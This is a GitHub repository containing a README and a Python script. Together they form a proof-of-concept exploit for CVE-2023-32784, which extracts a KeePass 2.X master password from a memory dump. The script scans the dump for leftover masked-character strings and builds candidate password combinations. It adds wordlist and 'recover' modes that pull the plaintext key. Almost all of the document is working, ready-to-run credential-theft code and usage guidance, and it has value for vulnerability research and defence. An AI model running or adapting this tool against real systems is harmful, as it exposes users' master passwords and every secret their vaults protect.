├── assets ├── combos.png ├── skip.png ├── example.png ├── wordlist.png └── wordsearch.png ├── README.md └── keepass_dump.py /assets/combos.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/combos.png -------------------------------------------------------------------------------- /assets/skip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/skip.png -------------------------------------------------------------------------------- /assets/example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/example.png -------------------------------------------------------------------------------- /assets/wordlist.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordlist.png -------------------------------------------------------------------------------- /assets/wordsearch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordsearch.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Keepass-Dumper 2 | 3 | This is my PoC implementation for [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784) 4 | 5 | My version is a python port of [@vdohney's PoC](https://github.com/vdohney/keepass-password-dumper) along with a few changes and additional features. 6 | 7 | ## Changes 8 | 9 | # 10 | 11 | One change, was to use known strings that can be found within the dump file in order to more accurately jump to the location of the masterkey characters. This results in less false positive characters and greatly reduces the amount of time it takes to scan the file. In the case the the strings aren't found in the dump file, the scan will start from the beginning. This option is enabled by default, but if you want to do a full scan instead, you can use `--full-scan`. For these instances, I've also added a `--skip` flag to help speed up the scan. This is done by offsetting the pointer to jump over the the next 1000 bytes as they typically just contain same character repeated multiple. For example, if the character `●e`, was found in the dump file, it would appear like the following: 12 | 13 | ``` 14 | ●e 15 | ●e 16 | ●e 17 | ●e 18 | ●e 19 | ●e 20 | ●e 21 | ●e 22 | ●e 23 | ●e 24 | ●●c 25 | ``` 26 | 27 | Using the `--skip` flag, it's possible to jump over these repeated bytes to help speed up the scan, although this isn't necessary when using the jump points. 28 | 29 | ``` 30 | [*] 15567777 | Found: ●e 31 | [*] 15568797 | Found: ●e 32 | [*] 15570355 | Found: ●●c 33 | [*] 15571375 | Found: ●●c 34 | [*] 15572925 | Found: ●●●r 35 | [*] 15573973 | Found: ●●●r 36 | ``` 37 | 38 | ![alt text](assets/skip.png) 39 | 40 | ## Features 41 | 42 | # 43 | 44 | This version includes a recovery functionality which attempts to find any remaining unknown characters for the key. This is done by trying to locate the different posssible combinations of the characters found inside the dump, if a match is found, the remaining characters are pulled from the dump until the next nonascii character is found. 45 | 46 | This works if the **full** plaintext password is stored within the dump file (this seems to happen when user displays the masterkey by deactivating hiding using asterisks). 47 | 48 | You can enable this behavoir using the `--recover` flag. 49 | 50 | ![alt text](assets/example.png) 51 | 52 | # 53 | 54 | You can also specify an ouput file using `-o` to export the different combinations found. Here you can see, even in the case where characters for another masterkey were found, along with the plaintext password not being stored in the dump, in the combo list we're still able to obtain **23/24** characters for the key in the final combination found below. 55 | 56 | ![alt text](assets/combos.png) 57 | 58 | In this case, the first entry also actually shows `4/5` characters for the second key, `ducks`, that was inside the dump as well, however it was paired together with the characters for the other key resulting in `ucks`|`tMasterPassword123!`. There seems to potentially be a workaround for this, however it's still a WIP. 59 | 60 | # 61 | 62 | I've also added the ability to search for potential passwords inside the dumpfile by providing a wordlist with `-w`. This flag will generate strings containing characters from the words found in the list to search for within the dump file. You can also specify padding for the strings created using the `-p` or `--padding` flags. 63 | 64 | Example: `--padding 2` => ●●a | `--padding 3` => ●●●a 65 | 66 | ![alt text](assets/wordlist.png) 67 | 68 | For the example above, the password was stored in plaintext within the dump. So it was possible to match the string found to pull the additional characters. However, in the case that the plaintext password is not stored in plaintext within the dump, it's still possible to extracting the remaining the remaining characters: 69 | 70 | ![alt text](assets/wordsearch.png) 71 | 72 | In this case, even though it wasn't able to find a plaintext match in the dump, it was still able to extract all the additional characters. 73 | 74 | ## References 75 | 76 | # 77 | 78 | Credit to [@vdohney](https://github.com/vdohney) who originally discovered this vulnerability Link to their project is [here](https://github.com/vdohney/keepass-password-dumper) 79 | 80 | CVE details: [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784) 81 | -------------------------------------------------------------------------------- /keepass_dump.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | from collections import deque, OrderedDict 3 | 4 | 5 | def get_args(): 6 | parser = argparse.ArgumentParser( 7 | description="Tool for extracting masterkey from a KeePass 2.X dump. (CVE-2023-32784)" 8 | ) 9 | parser.add_argument( 10 | "--recover", 11 | action="store_true", 12 | default=False, 13 | help="Attempts to recover any remaining unknown characters using combinations of the found characters", 14 | ) 15 | parser.add_argument( 16 | "-f", "--file", required=True, help="Path to the KeePass 2.X dump file" 17 | ) 18 | parser.add_argument("-w", "--wordlist", help="Scan the dumpfile against a wordlist") 19 | parser.add_argument( 20 | "--skip", 21 | default=False, 22 | action="store_true", 23 | help="Attempt to jump to the next ● character (Useful for large files but may miss characters)", 24 | ) 25 | parser.add_argument( 26 | "--set-skip", 27 | type=int, 28 | help="Change the number of bytes to skip when using --skip (default: 999 is when using --skip)", 29 | ) 30 | parser.add_argument( 31 | "--full-scan", 32 | action="store_true", 33 | default=False, 34 | help="Full dump scan (slower but may find more characters)", 35 | ) 36 | 37 | parser.add_argument( 38 | "-p", 39 | "--padding", 40 | default=0, 41 | type=int, 42 | help="Padding for wordlist search. (Ex: --padding 2 => ●●a | -- padding 3 => ●●●a)", 43 | ) 44 | 45 | parser.add_argument( 46 | "-o", "--output", help="Output file to write masterkey combinations to" 47 | ) 48 | parser.add_argument( 49 | "--debug", action="store_true", default=False, help="Print debug information" 50 | ) 51 | return parser.parse_args() 52 | 53 | 54 | class KeePassDump: 55 | def __init__(self, args): 56 | self.args = args 57 | with open(args.file, "rb") as f: 58 | self.mem_dump = f.read() 59 | self.size = len(self.mem_dump) 60 | 61 | self.combinations = deque() 62 | self.found = OrderedDict() 63 | if args.skip: 64 | print("[*] Skipping bytes") 65 | if args.set_skip: 66 | self._skip = args.set_skip 67 | else: 68 | self._skip = 999 69 | else: 70 | self._skip = 0 71 | 72 | def DumpPasswords(self): 73 | print("[*] Searching for masterkey characters") 74 | chars = self.dump_pw_chars() 75 | if chars: 76 | print(f"[*] Extracted: {{UNKNOWN}}{chars}") 77 | if self.args.recover: 78 | combos = get_word_combinations(chars, deque()) 79 | for c in combos: 80 | masterKey, found = self.recover(c) 81 | if found: 82 | print(f"[+] masterKey: {masterKey}") 83 | if self.args.output: 84 | with open(self.args.output, "w") as f: 85 | f.write("\n".join(combos) + "\n") 86 | print(f"[*] Saved {len(combos)} combinations to {self.args.output}") 87 | return 88 | else: 89 | print("[-] couldn't find any characters") 90 | 91 | def WordSearch(self): 92 | print(f"[*] Searching for masterkey using {self.args.wordlist}") 93 | wordlist = build_wordlist(self.args) 94 | searchResults = self.search_dump(wordlist) 95 | if searchResults: 96 | [print(f"[+] masterKey: {x}") for x in searchResults] 97 | 98 | def dump_pw_chars(self) -> str: 99 | current_len = 0 100 | dbg_str = deque() 101 | found = OrderedDict() 102 | if self.args.full_scan: 103 | print(f"[*] Full scan... This may take a few seconds.") 104 | return self._full_scan(current_len, dbg_str, found) 105 | else: 106 | idx, endSearch = self.__get_jump_points() 107 | 108 | mem = self.mem_dump 109 | since_last_char = 0 110 | while idx < endSearch: 111 | # stop searching if we haven't found anything else to reduce false positives 112 | if found and since_last_char > 10000000: 113 | if self.args.debug: 114 | print("[*] 10000000 bytes since last found. Ending scan.") 115 | break 116 | if isAsterisk(mem[idx], mem[idx + 1]): 117 | current_len += 1 118 | dbg_str.append("●") 119 | idx += 1 120 | elif current_len != 0: 121 | if isAscii(mem, idx): 122 | if current_len not in found: 123 | found[current_len] = bytes([mem[idx]]) 124 | elif mem[idx] not in found[current_len]: 125 | found[current_len] += bytes([mem[idx]]) 126 | 127 | if self.args.debug: 128 | print( 129 | f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}" 130 | ) 131 | since_last_char = 0 132 | idx += self._skip 133 | current_len = 0 134 | dbg_str.clear() 135 | idx += 1 136 | since_last_char += 1 137 | return self.display(found) 138 | 139 | def _full_scan(self, current_len, dbg_str, found): 140 | current_len = 0 141 | dbg_str = deque() 142 | found = OrderedDict() 143 | 144 | idx, endSearch = 0, self.size 145 | 146 | mem = self.mem_dump 147 | while idx < endSearch: 148 | if isAsterisk(mem[idx], mem[idx + 1]): 149 | current_len += 1 150 | dbg_str.append("●") 151 | idx += 1 152 | elif current_len != 0: 153 | if isAscii(mem, idx): 154 | if current_len not in found: 155 | found[current_len] = bytes([mem[idx]]) 156 | elif mem[idx] not in found[current_len]: 157 | found[current_len] += bytes([mem[idx]]) 158 | 159 | if self.args.debug: 160 | print( 161 | f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}" 162 | ) 163 | since_last_char = 0 164 | idx += self._skip 165 | current_len = 0 166 | dbg_str.clear() 167 | idx += 1 168 | return self.display(found) 169 | 170 | def display(self, found: OrderedDict) -> str: 171 | chars = [] 172 | print("[*] 0:\t{UNKNOWN}") 173 | for key, val in found.items(): 174 | print(f"[*] {key}:", end="\t") 175 | if len(val) > 1: 176 | candidates = b"<{" + b", ".join([c.to_bytes() for c in val]) + b"}>" 177 | else: 178 | candidates = val 179 | data = candidates.decode() 180 | print(data) 181 | chars.append(data) 182 | return "".join(chars) 183 | 184 | def recover(self, search_word: str, collected=[]) -> tuple[bool, str]: 185 | print("[?] Recovering...") 186 | 187 | if not collected: 188 | collected = deque([c for c in search_word]) 189 | 190 | key, success = self.extract_and_search(search_word, collected) 191 | if success: 192 | return key, success 193 | 194 | return False, "" 195 | 196 | def extract_and_search(self, char: str, collected_key_chars: deque): 197 | idx = self.mem_dump.find(char.encode()) 198 | if idx != -1: 199 | print(f"[*] Found match in dump for: {char}") 200 | key, found_ct = self.__extract_chars(idx, len(char), collected_key_chars) 201 | if found_ct != 0 and self.mem_dump.find(key.encode()) != -1: 202 | return key, True 203 | return "", False 204 | print(f"[-] Couldn't verify plaintext match in dump for: {char}") 205 | return "", False 206 | 207 | def search_dump(self, wordlist: dict[str, deque]) -> tuple[bool, str]: 208 | results = {} 209 | 210 | for idx, (word, patterns) in enumerate(wordlist.items()): 211 | print(f"[*] ({idx + 1}/{len(wordlist.keys())}): {word}") 212 | collected, success = self._pattern_search(patterns.copy()) 213 | if success: 214 | char = "".join(collected).replace("●", "") 215 | print(f"[*] Found string: {char}") 216 | key, success = self.recover(char, collected) 217 | if success: 218 | results[word] = key 219 | else: 220 | print(f"[-] no matches found for: {word}") 221 | 222 | return list(set(results.values())) 223 | 224 | def _char_search_left(self, patterns: deque, collected: OrderedDict) -> deque: 225 | if not patterns: 226 | return deque(sorted(set(collected.values()))) 227 | 228 | target_char = patterns.pop() 229 | target_idx = self.mem_dump.find(target_char.encode("utf-16-le")) 230 | 231 | if target_idx != -1: 232 | collected[target_idx] = target_char 233 | if self.args.debug: 234 | print(f"[*] Match for: {target_char}") 235 | if target_idx - 2600 > 0: 236 | mem = self.mem_dump 237 | dbg_str = deque(maxlen=100) 238 | for i in range(1, 2500): 239 | idx = target_idx - 2500 - i 240 | if isAscii(mem, idx): 241 | for y in range(1, 99, 2): 242 | if isAsterisk(mem[idx - y - 1], mem[idx - y]): 243 | dbg_str.append("●") 244 | elif dbg_str: 245 | char = mem[idx : idx + 1].decode() 246 | self.__search_callback( 247 | idx, char, dbg_str, collected, patterns 248 | ) 249 | break 250 | dbg_str.clear() 251 | return self._char_search_left(patterns, collected) 252 | 253 | def _char_search_right(self, patterns: deque, collected: OrderedDict) -> deque: 254 | if not patterns: 255 | return deque(sorted(set(collected.values()))) 256 | 257 | target_char = patterns.popleft() 258 | target_idx = self.mem_dump.find(target_char.encode("utf-16-le")) 259 | mem = self.mem_dump 260 | 261 | if target_idx != -1: 262 | collected[target_idx] = target_char 263 | if self.args.debug: 264 | print(f"[*] Match for: {target_char}") 265 | if target_idx - 2600 > 0: 266 | mem = self.mem_dump 267 | dbg_str = deque(maxlen=100) 268 | for i in range(1, 2500): 269 | idx = target_idx + 2500 + i 270 | if isAsterisk(mem[idx + 1], mem[idx + i + 1]): 271 | dbg_str.append("●" * len(target_char)) 272 | if dbg_str: 273 | for y in range(1, 99, 2): 274 | if isAscii(mem, idx + y): 275 | char = mem[idx + y : idx + y + 1].decode() 276 | self.__search_callback( 277 | idx, char, dbg_str, collected, patterns 278 | ) 279 | break 280 | break 281 | return self._char_search_right(patterns, collected) 282 | 283 | def _pattern_search(self, patterns: deque): 284 | collected = deque() 285 | # copy we can use the original pattern in both searches 286 | _left_chars = self._char_search_left(patterns.copy(), OrderedDict()) 287 | _right_chars = self._char_search_right(patterns.copy(), OrderedDict()) 288 | 289 | if not _left_chars and not _right_chars: 290 | return collected, False 291 | 292 | # merge collected characters 293 | for i in range(len(_left_chars)): 294 | if _left_chars[i] not in _right_chars: 295 | _right_chars.insert(i, _left_chars[i]) 296 | 297 | collected.extend(_right_chars) 298 | return collected, True 299 | 300 | def __search_callback(self, idx, char, dbg_str, collected, patterns): 301 | dbg_str = f'{"".join(dbg_str)}{char}' 302 | if dbg_str not in collected.values(): 303 | collected[idx] = dbg_str 304 | if dbg_str not in patterns: 305 | if self.args.debug: 306 | print(f"[*] Match for: {char}") 307 | patterns.append(dbg_str) 308 | 309 | def __extract_chars(self, start: int, chars_len: int, collected) -> str: 310 | """Extracts the remaining characters of the masterkey from the dump if they're stored in plaintext by being displayed within the application""" 311 | print("[*] Extracted chars:", end="\t") 312 | mem = self.mem_dump 313 | 314 | init_len = len(collected) 315 | last_len = init_len 316 | 317 | for i in range(1, 99 - chars_len): # 99 => max length for masterkey 318 | if not 0x20 <= mem[start - i] <= 0x7E: 319 | break 320 | collected.appendleft(mem[start - i].to_bytes().decode()) 321 | 322 | print("{ ", end="") 323 | 324 | if len(collected) == last_len: 325 | print("(none)", end="") 326 | else: 327 | [print(collected[x], end="") for x in range(len(collected) - last_len)] 328 | 329 | print(" <- -> ", end="") 330 | 331 | last_len = len(collected) 332 | 333 | for i in range(99 - chars_len): 334 | if not 0x20 <= mem[start + chars_len + i] <= 0x7E: 335 | if len(collected) == last_len: 336 | print("(none)", end="") 337 | break 338 | char = mem[start + chars_len + i].to_bytes().decode() 339 | print(char, end="") 340 | collected.append(char) 341 | 342 | print(" }") 343 | 344 | if len(collected) == init_len: 345 | print("[-] No new chars found") 346 | return "".join(collected).replace("●", ""), 0 347 | 348 | return "".join(collected).replace("●", ""), len(collected) - init_len 349 | 350 | def __get_jump_points(self) -> tuple[int, int]: 351 | try: 352 | i = self.mem_dump.index(b"(Multiple values)") 353 | endSearch = self.mem_dump.rindex(b"(Multiple values)") 354 | if i != endSearch: 355 | print("[*] Using jump points") 356 | return i, endSearch 357 | print("Only one jump point found. Scanning with slower method.") 358 | return 0, len(self.mem_dump) - 1 359 | except: 360 | print("[-] Couldn't find jump points in file. Scanning with slower method.") 361 | return 0, len(self.mem_dump) - 1 362 | 363 | 364 | def isAscii(mem_dump, idx) -> bool: 365 | return 0x20 <= mem_dump[idx] and mem_dump[idx] <= 0x7E and mem_dump[idx + 1] == 0x00 366 | 367 | 368 | def isAsterisk(x, y) -> bool: 369 | return x == 0xCF and y == 0x25 370 | 371 | 372 | def get_word_combinations(chars, combinations, current="") -> deque: 373 | if not chars: 374 | combinations.append(current) 375 | return 376 | 377 | if chars.startswith("<{") and "}>" in chars: 378 | opening_idx = chars.index("<{") 379 | closing_idx = chars.index("}>") 380 | options = chars[opening_idx + 2 : closing_idx].split(", ") 381 | for option in options: 382 | get_word_combinations( 383 | chars[closing_idx + 2 :], combinations, current + option 384 | ) 385 | else: 386 | get_word_combinations(chars[1:], combinations, current + chars[0]) 387 | 388 | return combinations 389 | 390 | 391 | def build_wordlist(args) -> dict[str, deque]: 392 | with open(args.wordlist, "r") as f: 393 | wordlist = [line.strip() for line in f.readlines()] 394 | 395 | candidates: dict[str, deque] = {} 396 | 397 | for word in wordlist: 398 | candidates[word] = deque( 399 | [f"{'●' * (x + args.padding)}{word[x]}" for x in range(len(word))] 400 | ) 401 | return candidates 402 | 403 | 404 | def main(args): 405 | kpd = KeePassDump(args) 406 | 407 | if args.wordlist: 408 | kpd.WordSearch() 409 | else: 410 | kpd.DumpPasswords() 411 | 412 | 413 | if __name__ == "__main__": 414 | main(get_args()) 415 | --------------------------------------------------------------------------------